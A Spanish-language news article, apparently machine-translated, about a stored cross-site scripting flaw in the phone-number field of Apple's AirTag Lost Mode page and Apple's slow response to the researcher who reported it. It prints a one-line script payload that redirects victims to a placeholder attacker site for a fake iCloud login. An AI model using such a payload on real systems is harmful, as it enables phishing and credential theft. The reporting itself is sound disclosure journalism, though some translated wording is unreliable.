Apple olvidó desinfectar el campo Número de teléfono para AirTags perdidos
El éxito continúa llegando al programa de recompensas por errores de Apple, que los investigadores de seguridad dicen que es lento e inconsistente para responder a sus informes de vulnerabilidad.
Esta vez el vuln del día se debe a una falla en la desinfección de un campo de entrada de usuario, específicamente el campo de número de teléfono que los propietarios de AirTag usan para identificar sus dispositivos perdidos.
Ataque del buen samaritano
El consultor de seguridad y probador de penetración Bobby Rauch descubrió que Apple AirTags– pequeños dispositivos que se pueden colocar en artículos que se pierden con frecuencia, como computadoras portátiles, teléfonos o llaves del automóvil; no desinfecte las entradas de los usuarios. Este descuido abre la puerta al uso de AirTags en un ataque de caída. En lugar de inocular el estacionamiento de un objetivo con unidades USB cargadas de malware, un atacante puede dejar caer un AirTag preparado maliciosamente.
Este tipo de ataque no requiere muchos conocimientos tecnológicos: el atacante simplemente escribe un XSS válido en el campo del número de teléfono de AirTag, luego pone el AirTag en Modo Perdido y lo deja caer en algún lugar donde el objetivo probablemente lo encuentre. En teoría, escanear un AirTag perdido es una acción segura: solo se supone que debe mostrar una página web en https://found.apple.com/. El problema es que found.apple.com luego incrusta el contenido del campo del número de teléfono en el sitio web como se ve en el navegador de la víctima, sin limpiar.
La forma más obvia de explotar esta vulnerabilidad, según Rauch, es usar un XSS simple para mostrar un cuadro de diálogo de inicio de sesión de iCloud falso en el teléfono de la víctima. No se necesita mucho código en absoluto:
<script>window.location='https://path/to/badsite.tld/page.html';var a="";</script>sí found.apple.com integra inocentemente el XSS anterior en la respuesta para un AirTag escaneado, la víctima obtiene una ventana emergente que muestra el contenido de badside.tld/page.html. Podría ser un exploit del navegador de día cero o simplemente un cuadro de diálogo de phishing. Rauch plantea la hipótesis de un cuadro de diálogo de inicio de sesión de iCloud falso, que puede parecer real, pero en su lugar, descarga las credenciales de Apple de la víctima en el servidor del objetivo.
Si bien esta es una hazaña convincente, de ninguna manera es la única disponible: casi todo lo que puede hacer con una página web está sobre la mesa y disponible. Esto va desde el phishing simple, como muestra el ejemplo anterior, hasta exponer el teléfono de la víctima a una vulnerabilidad del navegador sin clics de día cero.
Más detalles técnicos y videos simples que muestran tanto la vulnerabilidad como la actividad de la red causada por la explotación de la vulnerabilidad de Rauch están disponibles en el sitio público de Rauch. divulgación en Medio.
Esta divulgación pública presentada por Apple
Según informes de Krebs sobre seguridad, Rauch revela públicamente la vulnerabilidad debido en gran parte a las fallas de comunicación de Apple, una cada vez más común Estribillo.
Rauch le dijo a Krebs que inicialmente reveló la vulnerabilidad en privado a Apple el 20 de junio, pero durante tres meses todo lo que la compañía le dijo fue que «todavía estaba investigando». Esta es una respuesta extraña para lo que parece ser un error extremadamente fácil de verificar y mitigar. Apple le envió un correo electrónico a Rauch el jueves pasado para decirle que la debilidad se solucionará en una próxima actualización, y le pidió que no hable públicamente al respecto mientras tanto.
Apple nunca respondió preguntas básicas planteadas por Rauch, como si tenía una línea de tiempo para corregir el error, si planeaba darle crédito por el informe y si sería elegible para una recompensa. La falta de comunicación de Cupertino hizo que Rauch se fuera Público en Medium, a pesar de que Apple pidió a los investigadores que mantengan en silencio sus hallazgos si quieren crédito y / o compensación por su trabajo.
Rauch expresó su disposición a trabajar con Apple, pero le pidió a la compañía que «brinde detalles sobre cuándo planea arreglar esto y si habría algún reconocimiento de error o pago de prima». También notificó a la empresa que planeaba publicar en 90 días. Rauch dice que la respuesta de Apple fue «básicamente, le agradeceríamos que no lo revelara».
Nos hemos puesto en contacto con Apple para solicitar comentarios y actualizaremos aquí con cualquier respuesta.
«Jugador orgulloso. Gurú del café. Alcoholico galardonado. Entusiasta de la cerveza. Estudiante. Aficionado a los zombis. Lector. Especialista en música. Aficionado a la comida».
